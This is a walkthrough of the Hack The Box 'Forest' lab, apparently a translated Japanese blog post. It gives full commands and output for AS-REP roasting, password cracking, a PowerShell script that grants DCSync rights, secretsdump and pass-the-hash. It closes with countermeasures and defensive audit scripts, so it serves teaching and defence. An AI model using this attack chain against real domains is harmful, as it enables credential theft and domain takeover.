
Hack The Box: Forest Walkthrough (Japanese)

Note

This walkthrough is an article whose purpose is to explain Forest, a Hack The Box (HTB) machine. It does not encourage unauthorized access or any other illegal activity.

Introduction

Someone told me about HTB, and as a trial I worked through intrusion and privilege escalation on a Windows environment. It was very hard, but thanks to the forum I somehow made it all the way to privilege escalation. In fact this was the first time I had compromised a server at all, privilege escalation included, so I leaned heavily on other HTB walkthroughs.
The walkthrough itself is simple, but I went down endless side paths and I think solving it took me about 40 hours.

The infocard is as follows.
[Screenshot: Forest infocard]

Walkthrough

nmap scan

There seems to be a convention that HTB boxes start with nmap, so I ran it.

kali@kali:~/Desktop/hackthebox$ sudo nmap -p 1-65535 -sV -sS -T4 forest

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 18:41 JST
Nmap scan report for forest (10.10.10.161)
Host is up (0.18s latency).
Not shown: 65492 closed ports
PORT      STATE    SERVICE      VERSION
53/tcp    open     domain?
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-27 10:10:25Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
140/tcp   filtered emfis-data
367/tcp   filtered mortgageware
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1258/tcp  filtered opennl
2538/tcp  filtered vnwk-prapi
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
4079/tcp  filtered santools
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6259/tcp  filtered unknown
7045/tcp  filtered unknown
8275/tcp  filtered unknown
9389/tcp  open     mc-nmf       .NET Message Framing
13708/tcp filtered netbackup
14153/tcp filtered unknown
29890/tcp filtered unknown
34453/tcp filtered unknown
44154/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49496/tcp filtered unknown
49664/tcp open     msrpc        Microsoft Windows RPC
49665/tcp open     msrpc        Microsoft Windows RPC
49666/tcp open     msrpc        Microsoft Windows RPC
49667/tcp open     msrpc        Microsoft Windows RPC
49671/tcp open     tcpwrapped
49676/tcp open     msrpc        Microsoft Windows RPC
49677/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49684/tcp open     msrpc        Microsoft Windows RPC
49698/tcp open     tcpwrapped
49717/tcp open     tcpwrapped
51352/tcp filtered unknown
51624/tcp filtered unknown
54203/tcp filtered unknown
54253/tcp filtered unknown
64363/tcp filtered unknown
~snip~

We can see that it is Windows Server 2016 and that 88/tcp, 135/tcp and 389/tcp are open. At this point one can already guess that it is probably an Active Directory server.

enum4linux

Looking at the forum, the word "enumeration" comes up several times.
This is the command I found while googling.
Below is an excerpt of the parts that looked useful.

kali@kali:~/Desktop/hackthebox/setup$ enum4linux forest
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 26 22:55:17 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... forest
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =======================
|    Users on forest    |
 =======================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA  Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator  Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy  Name: Andy Hislip   Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1  Name: HealthMailbox-EXCH01-010  Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e  Name: HealthMailbox-EXCH01-003  Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678  Name: HealthMailbox-EXCH01-005  Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e  Name: HealthMailbox-EXCH01-009  Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781  Name: HealthMailbox-EXCH01-006  Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d  Name: HealthMailbox-EXCH01-004  Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64  Name: HealthMailbox-EXCH01-008  Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9  Name: HealthMailbox-EXCH01-002  Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722  Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013  Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad  Name: HealthMailbox-EXCH01-001  Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238  Name: HealthMailbox-EXCH01-007  Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda   Name: Lucinda Berger    Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark  Name: Mark Brandt   Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez   Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron   Desc: (null)
index: 0x2373 RID: 0x1db2 acb: 0x00000010 Account: sm   Name: (null)    Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb  Name: Microsoft Exchange Migration  Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb  Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}   Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb  Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18  Name: Discovery Search Mailbox  Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a  Name: Microsoft Exchange    Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb  Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549  Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b  Name: Microsoft Exchange    Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b  Name: Microsoft Exchange    Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account:   Name: svc-alfresco  Desc: (null)
index: 0x2372 RID: 0x1db1 acb: 0x00000010 Account: test123  Name: (null)    Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[test123] rid:[0x1db1]
user:[sm] rid:[0x1db2]

 ===================================
|    Share Enumeration on forest    |
 ===================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on forest

 ==============================================
|    Password Policy Information for forest    |
 ==============================================
[+] Found domain(s):

    [+] HTB
    [+] Builtin

[+] Password Info for Domain: HTB

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000000

    [+] Domain Refuse Password Change: 0
    [+] Domain Password Store Cleartext: 0
    [+] Domain Password Lockout Admins: 0
    [+] Domain Password No Clear Change: 0
    [+] Domain Password No Anon Change: 0
    [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ========================
|    Groups on forest    |
 ========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

Quite a lot of information comes out.

Impacket GetNPUsers.py

GetNPUsers.py obtains a TGT for users who do not require Kerberos pre-authentication.
In Kerberos authentication, when a TGT is requested, pre-authentication can be used to check whether the request comes from a legitimate client. The client sends the KDC data such as a timestamp encrypted with the user's password, and the KDC verifies it, so only requests from a client that knows the password are accepted. (Needs verification.)
If pre-authentication is not required, any client can obtain a TGT, and after obtaining it the encrypted part of the response (which carries the session key) can be brute-forced.

Write the users found above into a file usernames.txt and run the command.

$ python GetNPUsers.py HTB/ -usersfile usernames.txt -dc-ip 10.10.10.161
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$svc-alfresco@HTB:a6be4868d34535d2be85708012228a4e$1773f2db3dd0f55878dd09f9997efce7498d20395c31c3a8b8ecb1d2ab293de1d32e8d566419801da9b8540dd117261af369804c10b07164ab1aa0576f75e46a793169966afc4acca4f1422846f7fd32a390873fb8b60515207e0bbf833ccfdf28d8ff6722e373688f9e11e2cec6e68426b91c011f7e93b06f522a589e0a119bb5b0dae58141809711c68bdac85e697277685b4795f9d68f35f7617ab1250cba534d69268f5ac5cde3601a14fcabd536a36b3a6b8b3a2c704363879df6d24c27619bc6309978e0534a6b526ae4845252956fc6c39f8eab0faedfd88d5f8f7bf6

John The Ripper

Now that we have the encrypted session-key portion of the TGT, we brute-force it. Password complexity matters.

$ john ./hashes.asreproast --wordlist=/usr/share/wordlists/rockyou.txt --format:krb5asrep
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:05 DONE (2020-03-22 20:29) 0.1890g/s 772355p/s 772355c/s 772355C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We find that the password of svc-alfresco is s3rvice.

Evil-WinRM

I forget why (maybe from trying HTTP against every open port?), but I had realised that WinRM was usable. I knew about Evil-WinRM from another walkthrough, so I tried it.
Windows Remote Management is, as the name says, a service for remote administration. Once connected you can do all sorts of things through PowerShell (something like ssh on Linux?).

After logging in with the password obtained from John The Ripper, we get the user flag!

ruby evil-winrm/evil-winrm.rb -i htb.local -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ../Desktop/user.txt
e5e4e47ae7022664cda6eb013fb0d9ed

After that, let's gather some general information.

whoami /all
net user /domain
Get-ADUser svc-alfresco -properties *
Get-ADOrganizationalUnit -Filter *
Get-ADGroup -Filter *
Get-ADGroupMember <group name>

BloodHound

A tool that visualises information inside AD. A handy tool that, among other things, shows the path from the current user to Domain Admins.
To use it, you first collect data with a tool called SharpHound and then feed the result into BloodHound.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc-alfresco\Documents\SharpHound.ps1

Data: 1297080 bytes of 1297080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-module ./SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV -NoSaveCache

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
    Directory: C:\Users\svc-alfresco\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/22/2020   5:10 AM          15381 20200322051006_BloodHound.zip
-a----        3/21/2020  11:17 PM        3279549 powerview.ps1
-a----        3/22/2020   5:09 AM         972811 SharpHound.ps1
-a----        3/22/2020   2:12 AM         241152 winPEAS.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20200322051006_BloodHound.zip

Info: Downloading C:\Users\svc-alfresco\Documents\20200322051006_BloodHound.zip to 20200322051006_BloodHound.zip

Info: Download successful!

This is where it starts to get confusing

Feed this zip file into BloodHound. After some fiddling in the UI, you get information like the following image.
[Screenshot: BloodHound graph of the path from svc-alfresco to Administrator]
The important thing on the path from svc-alfresco to Administrator is that svc-alfresco has full rights (GenericAll) over EXCHANGE WINDOWS PERMISSIONS (green box).
And that group has the right to modify the DACL of the domain (WriteDacl) (blue box).
In other words, if I become a member of EXCHANGE WINDOWS PERMISSIONS, I can do anything.
(Or is this really right?)

PowerShell

Since the Exchange-related permissions could be abused, I googled and found this article.
https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md

Its content boils down to "grant yourself the rights needed for DCSync and go for it", so I followed the article step by step.

# Create a user
$passwd = ConvertTo-SecureString "oijjp9iojoiasjdfiouehjwhjp99834" -AsPlainText -Force
New-ADUser labuser07 -Path "OU=Microsoft Exchange Security Groups,DC=htb,DC=local" -AccountPassword $passwd -Enabled $true -UserPrincipalName labuser07@htb.local

# and add it to the existing powerful-looking groups
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members labuser07
Add-ADGroupMember -Identity "Remote Management Users" -Members labuser07
Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members labuser07

# After logging in as labuser07, grant the rights needed for DCSync
Import-Module ActiveDirectory
$acl = Get-Acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID

# Ds-Replication-Get-Changes-All (rightsGuid of the extended right)
$objectguid = New-Object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectguid,$inheritanceType
$acl.AddAccessRule($ace)

# Ds-Replication-Get-Changes (rightsGuid of the extended right)
$objectguid = New-Object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectguid,$inheritanceType
$acl.AddAccessRule($ace)
# Write the modified DACL back to the domain object
Set-Acl -AclObject $acl "ad:DC=htb,DC=local"

Check whether the rights were really granted.

*Evil-WinRM* PS C:\Users\labuser07\Documents> (Get-Acl "ad:/DC=htb,DC=local").Access | Where-Object {$_.IdentityReference -eq "HTB\labuser07"}


ActiveDirectoryRights : ExtendedRight
InheritanceType       : None
ObjectType            : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : HTB\labuser07
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

ActiveDirectoryRights : ExtendedRight
InheritanceType       : None
ObjectType            : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : HTB\labuser07
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

They were.

Impacket secretsdump

Do the DCSync.
This tool seems to attempt the dump in various ways, but I do not yet understand how it dumps, or how far.

$ impacket-secretsdump -just-dc htb.local/labuser07:oijjp9iojoiasjdfiouehjwhjp99834@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
~(snip)~

pth-winexe

A tool for Pass the Hash.
Roughly speaking, even without knowing the password, if you know the NTLM hash you can construct the authentication-response packets that the NTLMv2 specification expects, so you can log in.

$ pth-winexe -U htb.local/Administrator%aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 //10.10.10.161 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
C:\Windows\system32>whoami && hostname
whoami && hostname
htb\administrator
FOREST

Got root.

Causes

This box has a high real-life rating, so I thought about the root causes.

1. Kerberos pre-authentication was not enabled.

If only this setting had been enabled, the local (offline) brute force would not have been possible.
https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

Countermeasures

  • Kerberos pre-authentication is enabled by default, so do not change that setting.
  • Use a command to find users with DONT_REQUIRE_PREAUTH.
    • Get-ADUser -Filter {userAccountControl -band 4194304}
    • KerbPreAuth.vbs from the article above
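As an added example that is not part of the original article, the following PowerShell audit extends the one-liner above and the pre-authentication discussion in the GetNPUsers.py section: it lists every account with DONT_REQUIRE_PREAUTH set, with its group memberships and whether it also has an SPN, and can re-enable pre-authentication for them. It assumes the ActiveDirectory RSAT module and an account allowed to read and modify user objects; the function names are my own.

```powershell
# Added example, not from the original article. Assumes the ActiveDirectory
# module (RSAT) and an account allowed to read and modify user objects.
Import-Module ActiveDirectory

# userAccountControl bit 0x400000 (decimal 4194304) = DONT_REQUIRE_PREAUTH
$DontRequirePreAuth = 0x400000

function Get-PreAuthDisabledUser {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    # The LDAP_MATCHING_RULE_BIT_AND rule (1.2.840.113556.1.4.803) makes the DC
    # evaluate the bit test server-side instead of pulling every user object.
    # Groups: CN part of each memberOf DN. HasSPN: an SPN on top of no
    # pre-auth means the account's key is exposed through two different paths.
    Get-ADUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=$DontRequirePreAuth)" `
               -SearchBase $SearchBase `
               -Properties userAccountControl, memberOf, servicePrincipalName, whenChanged |
        Select-Object SamAccountName, Enabled, whenChanged,
            @{ n = 'Groups'; e = { ($_.memberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ';' } },
            @{ n = 'HasSPN'; e = { [bool]$_.servicePrincipalName } }
}

function Disable-PreAuthExemption {
    param([switch]$WhatIf)
    foreach ($u in Get-PreAuthDisabledUser) {
        # Setting DoesNotRequirePreAuth to $false clears the UAC bit; -WhatIf is a dry run
        Set-ADAccountControl -Identity $u.SamAccountName -DoesNotRequirePreAuth $false -WhatIf:$WhatIf
        if (-not $WhatIf) { Write-Output "Pre-authentication re-enabled for $($u.SamAccountName)" }
    }
}

# Usage: report first, remediate only after the list has been reviewed
Get-PreAuthDisabledUser | Format-Table -AutoSize
# Disable-PreAuthExemption -WhatIf
```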

2. A complex password was not used.

It is a hard problem, but the O365 admin documentation lists examples of failures and successes, which is interesting.
https://docs.microsoft.com/ja-jp/microsoft-365/admin/misc/password-policy-recommendations
In this case a user with a certain level of privileges was taken over, so perhaps multi-factor authentication should be required at least for users with such privileges.

Countermeasures

  • Use multi-factor authentication.
  • Educate users to use good passwords.

3. Permissions were not set up properly after installing Exchange.

svc-alfresco belongs to Account Operators, and after Exchange is installed this security group is granted rights over Exchange Windows Permissions.
Microsoft has published documentation on this behaviour.
https://support.microsoft.com/ja-jp/help/4490059/using-shared-permissions-model-to-run-exchange-server

Countermeasures

  • Periodically review and inventory permissions.
  • Try running BloodHound inside your own organisation.

Finally

I have never administered AD, so I have no idea how any of it works.
I intend to keep learning through HTB.
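As an added example that is not from the original article or the linked repository, this PowerShell check does the permission inventory that the countermeasures above call for and covers the BloodHound finding (WriteDacl on the domain) as well: it reads the DACL of the domain object, as the walkthrough did to verify the added ACEs, and reports every principal holding the DCSync replication rights or GenericAll/WriteDacl/WriteOwner, flagging any not in an allow-list. It assumes the ActiveDirectory module (which provides the AD: drive) and read access to the domain object; the default allow-list and the function name are my own assumptions.

```powershell
# Added example, not from the original article. Assumes the ActiveDirectory
# module (which provides the AD: drive) and read access to the domain object.
Import-Module ActiveDirectory

# rightsGuid values of the replication extended rights abused by DCSync
# (the same two GUIDs the walkthrough granted to labuser07).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function Get-DomainObjectRiskyAce {
    param(
        [string]$DomainDN = (Get-ADDomain).DistinguishedName,
        [string[]]$ExpectedHolders
    )
    if (-not $ExpectedHolders) {
        # Assumption: a plain default domain. Extend this for legitimate sync
        # accounts (e.g. an Entra Connect / Azure AD Connect service account).
        $nb = (Get-ADDomain).NetBIOSName
        $ExpectedHolders = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
            'BUILTIN\Administrators', "$nb\Domain Controllers", "$nb\Enterprise Admins", "$nb\Domain Admins")
    }
    $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$DomainDN"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString()
        $reason = $null

        # GenericAll/WriteDacl/WriteOwner let the holder grant themselves the rights
        # below: this is the Exchange Windows Permissions -> domain edge BloodHound showed.
        if ($ace.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner') {
            $reason = "$($ace.ActiveDirectoryRights) on the domain object"
        } elseif ($ace.ActiveDirectoryRights.HasFlag($extendedRight)) {
            if ($ReplicationRights.ContainsKey($guid)) {
                $reason = $ReplicationRights[$guid]
            } elseif ($guid -eq [guid]::Empty.ToString()) {
                # An all-zero ObjectType means every extended right, replication included
                $reason = 'All extended rights (includes replication)'
            }
        }
        if (-not $reason) { continue }

        [pscustomobject]@{
            Identity   = $ace.IdentityReference.Value
            Right      = $reason
            Inherited  = $ace.IsInherited
            Unexpected = ($ExpectedHolders -notcontains $ace.IdentityReference.Value)
        }
    }
}

# Usage: review the full list, then alert on anything flagged as unexpected
$findings = Get-DomainObjectRiskyAce
$findings | Format-Table -AutoSize
$findings | Where-Object Unexpected | ForEach-Object { Write-Warning "Unexpected holder: $($_.Identity) -> $($_.Right)" }
```

Run on the box as left by the walkthrough, HTB\labuser07 would show up twice with Unexpected = True, one row per replication right.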
